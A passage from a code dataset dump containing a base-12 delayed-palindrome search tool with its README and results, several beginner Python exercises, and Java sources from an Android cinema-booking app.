is_palindrome_test(i) == is_palindrome_simple(i)\n\n\ndef test_check():\n for i in range(1, 100):\n assert check(i) == check_simple(i)\n\n\ndef test_check_range():\n for i, n in check_range(1, 100).items():\n for _ in range(i):\n n = reverse_and_add_simple(n)\n assert is_palindrome_simple(n)\n" }, { "alpha_fraction": 0.5053533315658569, "alphanum_fraction": 0.7384903430938721, "avg_line_length": 15.828828811645508, "blob_id": "7aaee5535fba7db9c7366c074e13190e17d6d220", "content_id": "7f3f848e179f39087e8d23c8cd8104fa949f30c2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3736, "license_type": "permissive", "max_line_length": 108, "num_lines": 222, "path": "/README.md", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "# Most delayed palindromes generator\n\nThis is an utility that I used to solve little programming quiz back at the university.\n\n## Problem statement\n\nWe were asked to find the most delayed palindrome for any natural number.\n\nMost delayed palindrome of N is the **smallest** decimal natural number which in **exactly** N iterations of\nthe reverse-and-add operation results in the palindrome in the duodecimal system (and at none\nof the previous iterations it is a palindrome).\n\nPalindrome is the number that satisfies `str(n) == ''.join(reversed(str(n)))` (assuming str works\nin duodecimal system).\n\nReverse-and-add operation can be defined as `lambda n: n + int(reversed(str(n)))` (assuming str works\nin duodecimal system).\n\n### Example\n\nLet's see an example of number `23` (decimal) = `1B` (duodecimal).\n\nFirst iteration:\n\n```\n1B + 1B = 110 (duodecimal)\n```\n\nSecond iteration:\n\n```\n110 + 110 = 121 (duodecimal)\n```\n\n`121` (duodecimal) is a palindrome which makes `23` (decimal) second \nmost delayed palindrome. The first one is `12` and the zeroth one is `1`.\n\n## Solution\n\nLet's just iterate over all natural numbers from 1 to infinity, applying to them\nadd-and-reverse operation iteratively, M iterations maximum. At some point we will\nfind all first M most delayed palindromes.\n\nThe key is efficiency. My implementation is written in Cython and is parallelised using multiprocessing.\nIt achieves performance of `14277` numbers per second per thread\non the Intel Core i5 1.4 Ghz (with 200 iterations per number).\n\n## Installation\n\n 1. Clone the repository:\n\n ```shell script\n git clone https://github.com/meownoid/add-and-reverse.git\n ```\n\n 2. Install the dependencies:\n\n ```shell script\n pip install -r requirements.txt\n ```\n\n 3. Build the Cython code:\n\n ```shell script\n cythonize -ai _fast.pyx\n ```\n\n## Running\n\nTo check numbers up to `10000` using `8` threads:\n\n```shell script\npython main.py --threads 8 --numbers 10000\n```\n\nOutput looks like this:\n\n```\nStart: 1\nEnd: 80000\nNumber of threads: 8\nFound new numbers: 45\nBye\n```\n\nResults are stored in the `db.sqlite`.\nRunning the application next time will restore last saved state and computation will continue.\n\nTo just print the results and exit use the `--results` argument:\n\n```shell script\npython main.py --results\n```\n\n## Benchmarking\n\nTo benchmark the performance use the `--benchmark` argument:\n\n```shell script\npython main.py --benchmark\n```\n\nBenchmark results will be printed after the computation:\n\n```\nBenchmark results:\n Total time: 8.755 seconds\n Numbers per second: 114223\n Numbers per second per thread: 14277\n```\n\n## Running tests\n\n```shell script\npytest test.py\n```\n\n## Results (up to 100)\n\n| n | result |\n|---|--------|\n0|1\n1|12\n2|23\n3|83\n4|95\n5|236\n6|107\n7|248\n8|267\n9|1139\n10|1847\n11|2445\n12|1547\n13|273\n14|131\n15|21996\n16|1835\n17|274\n18|280\n19|1535\n20|22404\n21|22275\n22|21655\n23|21645\n24|22048\n25|21862\n26|3587\n27|3449\n28|39736\n29|40607\n30|41471\n31|43187\n32|21921\n33|21726\n34|21754\n35|22162\n36|30524\n37|15647\n38|229079\n39|22090\n40|26632\n41|62987\n42|29806\n43|333210\n44|146123\n45|22148\n46|30951\n47|267704\n48|271143\n49|83195\n50|29514\n51|2996385\n52|3003944\n53|3004326\n54|3741686\n55|2997888\n56|3006611\n57|3006407\n58|3087848\n59|3108534\n60|3250214\n61|4745796\n62|4230573\n63|3002068\n64|5482792\n65|3002589\n66|3006222\n67|4230137\n68|3055027\n69|3003385\n70|3000658\n71|3735496\n72|4996357\n73|3058524\n74|53766429\n75|29867135\n76|5478765\n77|3006523\n78|3000199\n79|996191\n80|255738\n81|145931\n82|143855\n83|353940\n84|430124574\n85|430121283\n86|431991805\n87|430114053\n88|430140883\n89|430561503\n90|430115012\n91|430197084\n92|179169803\n93|36038359\n94|23906759\n95|286673255\n96|46158332\n97|27117431\n98|503428020\n99|7453043706\n100|3009901223\n" }, { "alpha_fraction": 0.37931033968925476, "alphanum_fraction": 0.6551724076271057, "avg_line_length": 13.5, "blob_id": "7542e501a4a58c209c54571372be541030ba6310", "content_id": "b671fedc15bab186c30793b4e2244c29c9f8c529", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 29, "license_type": "permissive", "max_line_length": 14, "num_lines": 2, "path": "/requirements.txt", "repo_name": "meownoid/add-and-reverse", "src_encoding": "UTF-8", "text": "numpy>=1.15.0\nCython>=0.29.0\n" } ]
4
yeeun0507/likelion_python
https://github.com/yeeun0507/likelion_python
938e89c1fc73be824ede103e12862f8d13734f74
75a571148990d5892e022810f31ec179c1149f07
da97746f4d16d1c52a4bf82568c79be4a4dcbcf4
refs/heads/master
2022-08-07T22:44:52.295190
2020-05-16T16:24:49
2020-05-16T16:24:49
264,408,163
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.3949579894542694, "alphanum_fraction": 0.47058823704719543, "avg_line_length": 14.714285850524902, "blob_id": "c67db1d686698d35fcebf98fc57b59f242af5c32", "content_id": "4f8ddc0296804c7190a81a488f5111e362624136", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 119, "license_type": "no_license", "max_line_length": 31, "num_lines": 7, "path": "/code/11.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "num = 0\r\nsum = 0\r\nwhile num < 1000:\r\n num += 1\r\n if (num % 3) != 0: continue\r\n sum = sum + num\r\nprint(sum)\r\n\r\n" }, { "alpha_fraction": 0.3207547068595886, "alphanum_fraction": 0.5849056839942932, "avg_line_length": 14.333333015441895, "blob_id": "7145423348ce0f5b0d76c98b3711cd09766d9f5a", "content_id": "633413b270652386a84d9b51092d86cef473540e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 53, "license_type": "no_license", "max_line_length": 22, "num_lines": 3, "path": "/code/3.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "pin = \"881120-1068234\"\r\nprint(pin[7])\r\nresult =\r\n\r\n\r\n" }, { "alpha_fraction": 0.32679739594459534, "alphanum_fraction": 0.5032680034637451, "avg_line_length": 17.125, "blob_id": "1b53ac962410fd1d9d501b4074e5849186b611fe", "content_id": "679968b6bb20ffaf83962edbeb6c7a5050d88d56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 153, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/code/12.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "A = [20, 55, 67, 82, 45, 33, 90, 87, 100, 25]\r\nnum = -1\r\nsum = 0\r\nwhile num < 9:\r\n\tnum += 1\r\n\tif A[num] < 50: continue\r\n\tsum = sum + A[num]\r\nprint(sum)\r\n" }, { "alpha_fraction": 0.4833333194255829, "alphanum_fraction": 0.4833333194255829, "avg_line_length": 18, "blob_id": "dacc7a100e0d8911e745be82875bd0aa7dba4258", "content_id": "f81d2847245e905396e74c7ac104c36f0bed2181", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 60, "license_type": "no_license", "max_line_length": 34, "num_lines": 3, "path": "/code/6.txt", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "li= ['Life', 'is', 'too', 'short']\r\n\r\nprint(\"\".join(list))\r\n" }, { "alpha_fraction": 0.44144144654273987, "alphanum_fraction": 0.4954954981803894, "avg_line_length": 10.333333015441895, "blob_id": "f943a1d1fc6cdea7e511e26e3adfc463a4fa1679", "content_id": "fc2ae1cf6d6193e9a1abbb24aeff5b01899269af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111, "license_type": "no_license", "max_line_length": 32, "num_lines": 9, "path": "/code/15.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "def average(*arg):\r\n\r\n avg = sum(arg) / len(arg)\r\n\r\n return avg\r\n\r\n\r\n\r\nprint(average(1, 2, 3, 4, 5, 6))\r\n" }, { "alpha_fraction": 0.4126984179019928, "alphanum_fraction": 0.5079365372657776, "avg_line_length": 19, "blob_id": "00abd8c08d860e56ec1d65a85cc2df7730db306b", "content_id": "b6720307d46f4d0b6c70e7641891b43173f1d0d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 48, "num_lines": 3, "path": "/code/9.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "dic = {'name':'홍길동', 'birth':'1128', 'age':'30'}\r\n\r\nprint(dic\r\n" }, { "alpha_fraction": 0.520588219165802, "alphanum_fraction": 0.5617647171020508, "avg_line_length": 20.66666603088379, "blob_id": "72e0637bb96818fc086b6581ba1a00b1a2196903", "content_id": "0e3ec3429277062e50b236aaf90b4bcfd5fdea04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "no_license", "max_line_length": 37, "num_lines": 15, "path": "/code/17.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "class MaxLimitCalculator(Calculator):\r\n def add(self, val):\r\n self.value += val\r\n if self.value > 100:\r\n self.value = 100\r\n return self.value\r\n else:\r\n return self.value\r\n\r\ncal = MaxLimitCalculator()\r\n\r\nprint(cal.add(60))\r\nprint(cal.add(30))\r\nprint(cal.add(20))\r\nprint(cal.add(50))\r\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 16.33333396911621, "blob_id": "fb92014f9e3878dc63b19f5b39d06f42bd6cb387", "content_id": "6346c1e3ba192828c18a07594a43e02cab5e51b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55, "license_type": "no_license", "max_line_length": 20, "num_lines": 3, "path": "/code/8.txt", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "tupel1 = (1,2,3)\r\ntuple2 = (4,)\r\nprint(tuple1=tuple2)\r\n" }, { "alpha_fraction": 0.4390243887901306, "alphanum_fraction": 0.6097561120986938, "avg_line_length": 33.28571319580078, "blob_id": "bca499d396186fcc56edd3ab14a616b844b20319", "content_id": "7840811ca114cd5f0ce6c000985a17a262d8f556", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 94, "num_lines": 7, "path": "/code/1.py", "repo_name": "yeeun0507/likelion_python", "src_encoding": "UTF-8", "text": "Python 3.8.3 (tags/v3.8.3:6f8c832, May 13 2020, 22:37:02) [MSC v.1924 64 bit (AMD64)] on win32\r\nType \"help\", \"copyright\", \"credits\" or \"license()\" for more information.\r\n>>> i= [80,75,55]\r\n>>> result = sum(i)\r\n>>> print(result/len(i))\r\n70.0\r\n>>> " } ]
9
SudhanshuVijay/music-player-using-python
https://github.com/SudhanshuVijay/music-player-using-python
6b95ba2a42528d4246eb3a6e52ead1e4bd669691
e691747390b519e457a8f13318e7e401ad192866
7386e79e5d70af48407c0ae56cee49722743132c
refs/heads/master
2022-12-25T20:41:05.487435
2020-10-01T07:07:55
2020-10-01T07:07:55
300,167,035
1
2
null
2020-10-01T06:12:31
2020-10-01T06:57:50
2020-10-01T07:07:55
Python
[ { "alpha_fraction": 0.6302149295806885, "alphanum_fraction": 0.6433312296867371, "avg_line_length": 24.476987838745117, "blob_id": "6ee1e597ba6942073568e0c7583fe67f667c575e", "content_id": "3036aa9bed34fff321bc7d1f22977db8d1a35b40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6328, "license_type": "no_license", "max_line_length": 115, "num_lines": 239, "path": "/melody.py", "repo_name": "SudhanshuVijay/music-player-using-python", "src_encoding": "UTF-8", "text": "import os\r\nfrom tkinter import *\r\n#HELLO BOYYS\r\nfrom tkinter import ttk\r\nfrom ttkthemes import themed_tk as tk\r\n\r\nimport tkinter.messagebox\r\nfrom tkinter import filedialog\r\nfrom pygame import mixer\r\nfrom mutagen.mp3 import MP3\r\nimport time\r\nimport threading\r\n\r\nroot = tk.ThemedTk()\r\n\r\nroot.get_themes()\r\nroot.set_theme(\"radiance\")\r\n\r\nmixer.init() # initializing the mixer\r\nroot.title(\"Melody\")\r\nroot.iconbitmap(r'images/melody.ico')\r\n\r\nstatusbar = Label(root, text=\"Wlcome To Melody\", relief=SUNKEN, anchor=W, font=\"Times 15 italic\")\r\nstatusbar.pack(side=BOTTOM, fill=X)\r\n\r\nfilelabel = ttk.Label(root, text='Welcome')\r\nfilelabel.pack()\r\n\r\nlengthlabel = ttk.Label(root, text='Total Length - --:--')\r\nlengthlabel.pack(pady=5)\r\n\r\ncurrenttimelabel = ttk.Label(root, text='Current Time - --:--', relief=GROOVE)\r\ncurrenttimelabel.pack()\r\n\r\n\r\nmenubar = Menu(root)\r\nroot.config(menu=menubar)\r\n\r\nsubMenu = Menu(menubar, tearoff=0)\r\n\r\nplaylist = []\r\n\r\n\r\ndef brows_file():\r\n global filename_path\r\n filename_path = filedialog.askopenfilename()\r\n add_to_playlist(filename_path)\r\n\r\n\r\ndef add_to_playlist(filename):\r\n filename = os.path.basename(filename)\r\n index = 0\r\n playlistbox.insert(index, filename)\r\n playlist.insert(index, filename_path)\r\n index += 1\r\n\r\n\r\nmenubar.add_cascade(label=\"File\", menu=subMenu)\r\nsubMenu.add_command(label='Open', command=brows_file)\r\nsubMenu.add_command(label='Exit', command=root.destroy)\r\n\r\n\r\ndef About_us():\r\n tkinter.messagebox.showinfo('About Melody', 'This is a music player, build using python tkinter by Sudhanshu Vijay')\r\n\r\n\r\nsubMenu = Menu(menubar, tearoff=0)\r\nmenubar.add_cascade(label=\"Help\", menu=subMenu)\r\nsubMenu.add_command(label='About Us', command=About_us)\r\n\r\nright_frame = Frame(root)\r\nright_frame.pack(side=RIGHT, pady=30)\r\n\r\nleft_frame = Frame(root)\r\nleft_frame.pack(side=LEFT, padx=30, pady=30)\r\n\r\ntop_frame = Frame(right_frame)\r\ntop_frame.pack()\r\n\r\nplaylistbox = Listbox(left_frame)\r\nplaylistbox.pack()\r\n\r\nadd_btn = ttk.Button(left_frame, text=\"+ Add\", command=brows_file)\r\nadd_btn.pack(side=LEFT)\r\n\r\n\r\ndef del_song():\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n playlistbox.delete(selected_song)\r\n playlist.pop(selected_song)\r\n\r\n\r\ndel_btn = ttk.Button(left_frame, text=\"- Del\", command=del_song)\r\ndel_btn.pack(side=LEFT)\r\n\r\n\r\ndef show_details(play_song):\r\n filelabel['text'] = \"Playing\" + ' - ' + os.path.basename(play_song)\r\n file_data = os.path.splitext(play_song)\r\n if file_data[1] == '.mp3':\r\n audio = MP3(play_song)\r\n total_length = audio.info.length\r\n else:\r\n a = mixer.Sound(play_song)\r\n total_length = a.get_length()\r\n\r\n mins, secs = divmod(total_length, 60)\r\n mins = round(mins)\r\n secs = round(secs)\r\n timeformat = '{:02d}:{:02d}'.format(mins, secs)\r\n lengthlabel['text'] = \"Total Length\" + ' - ' + timeformat\r\n\r\n t1 = threading.Thread(target=start_count, args=(total_length,))\r\n t1.start()\r\n\r\n\r\ndef start_count(t):\r\n global paused\r\n current_time = 0\r\n while current_time <= t and mixer.music.get_busy():\r\n if paused:\r\n continue\r\n else:\r\n mins, secs = divmod(current_time, 60)\r\n mins = round(mins)\r\n secs = round(secs)\r\n timeformat = '{:02d}:{:02d}'.format(mins, secs)\r\n currenttimelabel['text'] = \"Current Length\" + ' - ' + timeformat\r\n time.sleep(1)\r\n current_time += 1\r\n\r\n\r\ndef play_music():\r\n global paused\r\n\r\n if paused:\r\n mixer.music.unpause()\r\n statusbar['text'] = \"Music Resumed...\"\r\n paused = FALSE\r\n else:\r\n try:\r\n stop_music()\r\n time.sleep(1)\r\n selected_song = playlistbox.curselection()\r\n selected_song = int(selected_song[0])\r\n play_it = playlist[selected_song]\r\n mixer.music.load(play_it)\r\n mixer.music.play()\r\n statusbar['text'] = \"Playing Music...\" + ' ' + os.path.basename(play_it)\r\n show_details(play_it)\r\n except:\r\n tkinter.messagebox.showerror('File Not Found', 'Melody Could Not Find The File. Please Check It Again')\r\n\r\n\r\ndef stop_music():\r\n mixer.music.stop()\r\n statusbar['text'] = \"Music Stopped...\"\r\n\r\n\r\npaused = FALSE\r\n\r\n\r\ndef pause_music():\r\n global paused\r\n paused = TRUE\r\n mixer.music.pause()\r\n statusbar['text'] = \"Music Paused...\"\r\n\r\n\r\ndef rewind_music():\r\n play_music()\r\n statusbar['text'] = \"Music Rewinded...\"\r\n\r\n\r\ndef set_vol(val):\r\n volume = float(val) / 100\r\n mixer.music.set_volume(volume)\r\n\r\n\r\nmuted = FALSE\r\n\r\n\r\ndef mute_music():\r\n global muted\r\n if muted:\r\n mixer.music.set_volume(0.5)\r\n volumeButton.configure(image=volume_photo)\r\n scale.set(50)\r\n muted = FALSE\r\n else:\r\n mixer.music.set_volume(0)\r\n volumeButton.configure(image=mute_photo)\r\n scale.set(0)\r\n muted = TRUE\r\n\r\n\r\nmiddleframe = Frame(right_frame)\r\nmiddleframe.pack(pady=30, padx=30)\r\n\r\nplay_photo = PhotoImage(file='images/play.png')\r\nplayButton = ttk.Button(middleframe, image=play_photo, command=play_music)\r\nplayButton.grid(row=0, column=0, padx=10)\r\n\r\nstop_photo = PhotoImage(file='images/stop.png')\r\nstopButton = ttk.Button(middleframe, image=stop_photo, command=stop_music)\r\nstopButton.grid(row=0, column=1, padx=10)\r\n\r\npause_photo = PhotoImage(file='images/pause.png')\r\npauseButton = ttk.Button(middleframe, image=pause_photo, command=pause_music)\r\npauseButton.grid(row=0, column=2, padx=10)\r\n\r\nbottomframe = Frame(right_frame)\r\nbottomframe.pack(pady=10)\r\n\r\nrewind_photo = PhotoImage(file='images/rewind.png')\r\nrewindButton = ttk.Button(bottomframe, image=rewind_photo, command=rewind_music)\r\nrewindButton.grid(row=0, column=0)\r\n\r\nmute_photo = PhotoImage(file='images/mute.png')\r\nvolume_photo = PhotoImage(file='images/volume.png')\r\nvolumeButton = ttk.Button(bottomframe, image=volume_photo, command=mute_music)\r\nvolumeButton.grid(row=0, column=1)\r\n\r\nscale = ttk.Scale(bottomframe, from_=0, to=100, orient=HORIZONTAL, command=set_vol)\r\nscale.set(50)\r\nmixer.music.set_volume(0.5)\r\nscale.grid(row=0, column=2, pady=15, padx=30)\r\n\r\n\r\ndef on_closing():\r\n stop_music()\r\n root.destroy()\r\n\r\n\r\nroot.protocol(\"WM_DELETE_WINDOW\", on_closing)\r\n\r\nroot.mainloop()\r\n#nice job\r\n" } ]
1
dsitum/mKino
https://github.com/dsitum/mKino
656a8ae731f135812652b8387acf491e64de6498
c3949ccec32acb8de02c304650e172e31856b4a3
aa931c8defd510b09bfc6b2bb66d1f6d5bd59b0e
refs/heads/master
2021-01-10T20:14:04.890411
2015-02-08T23:54:11
2015-02-08T23:54:11
30,510,699
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6917840242385864, "alphanum_fraction": 0.6927229762077332, "avg_line_length": 31.543306350708008, "blob_id": "3382a9dd957f4735757d9e78353d4a9fe9a215ff", "content_id": "1c67a72d0b0192003e4fe8dc43408b396b1f8249", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4277, "license_type": "no_license", "max_line_length": 105, "num_lines": 127, "path": "/client-side/src/hr/air/mkino/server/JsonPrijava.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\nimport org.apache.http.NameValuePair;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.entity.UrlEncodedFormEntity;\r\nimport org.apache.http.client.methods.HttpPost;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.apache.http.message.BasicNameValuePair;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport hr.air.mkino.tipovi.Korisnik;\r\nimport android.os.AsyncTask;\r\n/**\r\n * klasa koja služi za prijavu korisnika u sustav uz pomoć asinkrone komunikacije \r\n * između aplikacije i servisa koji provjerava da li postoji korisnik u bazi \r\n * podataka sa navedenim korisničkim imenom i lozinkom\r\n * \r\n * */\r\npublic class JsonPrijava extends AsyncTask<String, Korisnik, String> {\r\n\r\n\t\t/**\r\n\t\t * Metoda koja izvršava provjeru korisnika uz pomoć servisa\r\n\t\t * @param korisnicko ime i odgovarajuća lozinka\r\n\t\t * @return popunjeni objekt tipa Korisnik(korisnickoIme, \"\", ime, prezime, email, telefon) \r\n\t\t * ukoliko je prijava uspjesna ili null ukoliko prijava nije uspješna\r\n\t\t */\r\n\t\tpublic Korisnik prijavi(String korisnickoIme, String lozinka)\r\n\t\t{\t\t\t\r\n\t\t\tthis.execute(korisnickoIme,lozinka );\r\n\t\t\tString jsonRezultat = \"\";\r\n\t\t\ttry {\r\n\t\t\t\tjsonRezultat = this.get();\r\n\t\t\t} catch (InterruptedException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t} catch (ExecutionException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn parsirajJson(jsonRezultat);\t\t\t\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Parsira json string dohvaćen s web servisa\r\n\t\t * @param jsonRezultat\r\n\t\t * @return popunjeni objekt tipa Korisnik(korisnickoIme, \"\", ime, prezime, email, telefon) \r\n\t\t * ukoliko je prijava uspjesna ili null ukoliko prijava nije uspjesna\r\n\t\t */\r\n\t\tprivate Korisnik parsirajJson(String jsonRezultat) {\t\t\r\n\t\t\tKorisnik korisnik = null;\r\n\t\t\t\r\n\t\t\ttry {\r\n\t\t\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\t\t\tint n = rezultati.length();\r\n\t\t\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tString korisnickoIme = rezultat.getString(\"korisnickoIme\");\r\n\t\t\t\t\t\t/*lozinka se ne dohvaća putem web servisa*/\r\n\t\t\t\t\t\tString lozinka = \"\";\r\n\t\t\t\t\t\tString ime = rezultat.getString(\"ime\");\r\n\t\t\t\t\t\tString prezime = rezultat.getString(\"prezime\");\r\n\t\t\t\t\t\tString email = rezultat.getString(\"email\");\r\n\t\t\t\t\t\tString telefon = rezultat.getString(\"telefon\");\r\n\t\t\t\t\t\t/*unošenje primljenih korisničkih podataka u objekt*/\r\n\t\t\t\t\t\tkorisnik = new Korisnik(korisnickoIme, lozinka, ime, prezime, email, telefon);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t}\r\n\t\t\t}\t\t\t\r\n\t\t\tcatch (JSONException e) {\t\r\n\t\t\t/*\r\n\t\t\t * izvršava se ukoliko prijava nije uspješna, odnosno ne postoji\r\n\t\t\t * korisnik sa traženim korisničkim imenom i lozinkom\r\n\t\t\t * */\r\n\t\t\t\te.printStackTrace();\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn korisnik;\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Metoda za asinkronu komunikaciju između aplikacije i servisa.\r\n\t\t * @param korisnicko ime i lozinka u obliku ArrayList\r\n\t\t * @return odgovor servisa u json obliku\r\n\t\t * */\r\n\t\tprotected String doInBackground(String... podaciPrijava) {\r\n\t\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\t \r\n\t\t\tHttpPost httpPostZahtjev = new HttpPost(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=prijava\");\r\n\t\t\tString jsonResult = \"\";\r\n\t\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\t\r\n\t\t\t\r\n\t\t\ttry {\r\n\t\t\t\tList<NameValuePair> nameValuePairs = new ArrayList<NameValuePair>(2);\r\n\t\t\t nameValuePairs.add(new BasicNameValuePair(\"korisnickoIme\", podaciPrijava[0]));\r\n\t\t\t nameValuePairs.add(new BasicNameValuePair(\"lozinka\", podaciPrijava[1]));\r\n\t\t\t \r\n\t\t\t httpPostZahtjev.setEntity(new UrlEncodedFormEntity(nameValuePairs));\t\t\t \r\n\t\t\t\tjsonResult = httpKlijent.execute(httpPostZahtjev, handler);\r\n\t\t\t}\r\n\t\t\tcatch(ClientProtocolException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\tcatch(IOException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\t\treturn jsonResult;\r\n\t\t}\r\n\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.7505054473876953, "alphanum_fraction": 0.7509098052978516, "avg_line_length": 36.640625, "blob_id": "f864e450a6053149816001ae2ad2f2c43049eedf", "content_id": "0f33a36312dd114d680d4258c9b4b664f0a80c36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2479, "license_type": "no_license", "max_line_length": 135, "num_lines": 64, "path": "/client-side/src/hr/air/mkino/DetaljiFilmaActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\nimport hr.air.mkino.baza.FilmoviAdapter;\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\nimport hr.air.mkino.tipovi.FilmInfo;\r\nimport hr.air.mkino.uzorcidizajna.UcitajSlikuFactory;\r\nimport android.app.Activity;\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\nimport android.widget.ImageView;\r\nimport android.widget.TextView;\r\n\r\n/**\r\n * Ova klasa predstavlja detalje pojedinog filma.\r\n * @author domagoj\r\n *\r\n */\r\npublic class DetaljiFilmaActivity extends Activity {\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_detalji_filma);\r\n\t\tsetTitle(\"Detalji filma\");\r\n\t\t\r\n\t\tFilmInfo detaljiFilma = dohvatiPodatkeZaFilm();\r\n\t\tprikaziPodatkeZaFilm(detaljiFilma);\r\n\t}\r\n\r\n\t/**\r\n\t * Dohvaća podatke filma koji uključuju naziv, glavne uloge, autora itd.\r\n\t * ID filma prima pomoću podataka iz intenta, koji su poslani klikom na film sa liste svih aktualnih filmova (klasa AkutalnoActivity).\r\n\t * @return podaci o filmu\r\n\t */\r\n\tprivate FilmInfo dohvatiPodatkeZaFilm() {\r\n\t\tIntent i = getIntent();\r\n\t\tint idFilmaUBazi = i.getIntExtra(\"idFilmaUBazi\", 0);\r\n\t\t\r\n\t\tFilmoviAdapter fa = new FilmoviAdapter(this);\r\n\t\treturn fa.dohvatiDetaljeFilma(idFilmaUBazi);\r\n\t}\r\n\t\r\n\t/**\r\n\t * Ispisuje na zaslonu informacije sve dohvaćene o filmu, uključujući i sliku filma.\r\n\t * @param detaljiFilma predstavlja informacije o filmu koje treba ispisati na zaslon\r\n\t */\r\n\tprivate void prikaziPodatkeZaFilm(FilmInfo detaljiFilma) {\r\n\t\tTextView naslov = (TextView) findViewById(R.id.naslov_filma);\r\n\t\tTextView trajanje = (TextView) findViewById(R.id.detalji_filma_trajanje);\r\n\t\tTextView zanr = (TextView) findViewById(R.id.detalji_filma_zanr);\r\n\t\tTextView redatelj = (TextView) findViewById(R.id.detalji_filma_redatelj);\r\n\t\tTextView glavneUloge = (TextView) findViewById(R.id.detalji_filma_glumci);\r\n\t\tTextView opis = (TextView) findViewById(R.id.detalji_filma_detalji);\r\n\t\tImageView slika = (ImageView) findViewById(R.id.slikaFilma);\r\n\t\t\r\n\t\tnaslov.setText(detaljiFilma.getNaziv());\r\n\t\ttrajanje.setText(detaljiFilma.getTrajanje() + \" minuta\");\r\n\t\tzanr.setText(detaljiFilma.getZanr());\r\n\t\tredatelj.setText(detaljiFilma.getRedatelj());\r\n\t\tglavneUloge.setText(detaljiFilma.getGlavneUloge());\r\n\t\topis.setText(detaljiFilma.getOpis());\r\n\t\tISlikaFilma sf = UcitajSlikuFactory.ucitaj(getBaseContext(), detaljiFilma.getIdFilma(), true);\r\n\t\tslika.setImageBitmap(sf.dohvatiVelikuSliku());\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.6786172986030579, "alphanum_fraction": 0.6856849193572998, "avg_line_length": 38.74345397949219, "blob_id": "4aa351ad559492b8e121ee055931ecaf0f57cf95", "content_id": "9ab4b526a6cb92e5d082842339272bb35df809c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 7814, "license_type": "no_license", "max_line_length": 106, "num_lines": 191, "path": "/client-side/src/hr/air/mkino/core/Registracija.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package 